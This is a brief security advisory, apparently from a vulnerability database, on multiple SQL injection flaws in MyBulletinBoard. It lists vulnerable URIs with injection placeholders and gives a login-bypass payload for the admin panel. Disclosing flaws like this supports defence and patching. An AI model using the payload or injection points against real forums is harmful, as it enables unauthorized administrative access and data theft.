MyBulletinBoard Multiple SQL Injection Vulnerabilities

MyBulletinBoard Multiple SQL Injection Vulnerabilities

No exploit is required.

The following proof of concept URI are available:
http://www.example.com/member.php?action=login : username='[SQL INJECTION]
http://www.example.com/polls.php?action=newpoll&tid=1&polloptions='[SQL INJECTION]
http://www.example.com/search.php?action='[SQL Injection]
http://www.example.com/member.php?action='[SQL Injection]

The following proof of concept demonstrates the vulnerability in admin/index.php:
Username: ' or 1=1 /*
Password: blank